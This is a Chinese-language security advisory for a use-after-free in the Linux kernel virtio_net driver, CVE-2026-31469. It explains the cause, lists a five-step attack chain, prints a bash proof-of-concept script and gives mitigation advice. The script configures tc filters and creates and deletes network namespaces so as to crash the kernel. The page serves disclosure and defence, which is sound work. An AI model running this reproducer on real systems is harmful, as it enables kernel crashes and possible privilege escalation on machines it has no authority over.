CVE-2026-31469 CVSS 7.8 高危

CVE-2026-31469 Linux内核virtio_net驱动UAF漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31469

漏洞类型

释放后使用 (UAF)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核virtio_net驱动存在释放后使用（UAF）漏洞。当驱动配置为napi_tx=N且设备清除IFF_XMIT_DST_RELEASE标志时，若网络命名空间被销毁，挂起的skb仍引用已释放的dst_ops结构体，导致内核崩溃。

技术细节

该漏洞发生在Linux内核virtio_net驱动模块中。当系统配置了tc路由过滤器导致net_device的IFF_XMIT_DST_RELEASE标志被清除时，网络栈要求驱动负责维护skb->dst的生命周期。在napi_tx=N（即关闭NAPI TX）的配置下，数据包可能在virtio传输队列中长时间挂起。此时如果系统销毁了相关的网络命名空间，对应的dst_ops结构体会被内核释放。然而，virtio_net驱动仍持有指向该结构体的引用。当后续有新的数据包传输时，会触发free_old_xmit函数清理旧队列，进而调用dst_release操作已失效的dst_ops指针，导致释放后使用（UAF）错误，引发内核崩溃或潜在的权限提升。

攻击链分析

STEP 1

步骤1

攻击者配置tc qdisc和route filter，清除设备的IFF_XMIT_DST_RELEASE标志。

STEP 2

步骤2

确保virtio_net驱动处于napi_tx=N模式，使skb在传输环中停留。

STEP 3

步骤3

将网卡移入新的网络命名空间并进行流量测试，产生挂起的skb。

STEP 4

步骤4

销毁网络命名空间，导致dst_ops结构体被释放，但指针残留于驱动队列。

STEP 5

步骤5

触发新的传输或清理操作，调用dst_release访问非法内存，导致内核崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash

# Reproduction script for CVE-2026-31469
# This script configures the environment to trigger the UAF in virtio_net

NETDEV="enp3s0"

# Configure qdisc and route filter to clear IFF_XMIT_DST_RELEASE
config_qdisc_route_filter() {
    tc qdisc del dev $NETDEV root
    tc qdisc add dev $NETDEV root handle 1: prio
    tc filter add dev $NETDEV parent 1:0 protocol ip prio 100 route to 100 flowid 1:1
    ip route add 192.168.1.100/32 dev $NETDEV realm 100
}

# Test function to create and destroy namespace
test_ns() {
    ip netns add testns
    ip link set $NETDEV netns testns
    ip netns exec testns ifconfig $NETDEV 10.0.32.46/24
    ip netns exec testns ping -c 1 10.0.32.1
    ip netns del testns
}

# Execute PoC steps
config_qdisc_route_filter
test_ns
sleep 2
test_ns

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

避免在virtio_net设备上使用napi_tx=N模式，或避免配置会清除IFF_XMIT_DST_RELEASE标志的tc路由过滤器。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表